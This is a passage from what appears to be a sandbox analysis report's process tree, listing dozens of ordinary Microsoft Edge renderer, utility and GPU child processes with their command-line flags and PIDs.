  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
  2⤵
  PID:5160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:8
  2⤵
  PID:3248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
  2⤵
  PID:3964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:2652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
  2⤵
  PID:4088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
  2⤵
  PID:4348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
  2⤵
  PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6612 /prefetch:8
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3564 /prefetch:8
  2⤵
  - Modifies registry class
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
  2⤵
  PID:1440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1
  2⤵
  PID:3140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
  2⤵
  PID:7068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:1600
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3116 /prefetch:8
  2⤵
  PID:3836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
  2⤵
  PID:5600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
  2⤵
  PID:4692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:1
  2⤵
  PID:4572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  PID:5164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6168 /prefetch:8
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
  2⤵
  PID:1632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:1
  2⤵
  PID:1456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
  2⤵
  PID:2592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1
  2⤵
  PID:1688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
  2⤵
  PID:5944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
  2⤵
  PID:6600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
  2⤵
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
  2⤵
  PID:5936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
  2⤵
  PID:1752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7380 /prefetch:1
  2⤵
  PID:5228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7612 /prefetch:2
  2⤵
  PID:6248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7628 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4220 /prefetch:1
  2⤵
  PID:6556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:1
  2⤵
  PID:5904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1
  2⤵
  PID:6964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8032 /prefetch:1
  2⤵
  PID:6560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8072 /prefetch:1
  2⤵
  PID:4752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8436 /prefetch:1
  2⤵
  PID:5932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8076 /prefetch:1
  2⤵
  PID:5480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8812 /prefetch:1
  2⤵
  PID:6588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7796 /prefetch:1
  2⤵
  PID:4184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7700 /prefetch:1
  2⤵
  PID:6432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7720 /prefetch:8
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7396 /prefetch:1
  2⤵
  PID:6964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7604 /prefetch:1
  2⤵
  PID:6792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:1
  2⤵
  PID:6212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8104 /prefetch:1
  2⤵
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:1
  2⤵
  PID:3732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:1
  2⤵
  PID:6924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2400 /prefetch:1
  2⤵
  PID:1000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
  2⤵
  PID:5352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1
  2⤵
  PID:3352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:6420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7696 /prefetch:1
  2⤵
  PID:2240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
  2⤵
  PID:3520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5016 /prefetch:1
  2⤵
  PID:4500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7408 /prefetch:1
  2⤵
  PID:4020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
  2⤵
  PID:5568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
  2⤵
  PID:5900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
  2⤵
  PID:4468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7336 /prefetch:1
  2⤵
  PID:1968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8228 /prefetch:1
  2⤵
  PID:1604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:1
  2⤵
  PID:6108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8072 /prefetch:1
  2⤵
  PID:936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,547800368484022068,1877413351460851248,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:1
  2⤵
  PID:3616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
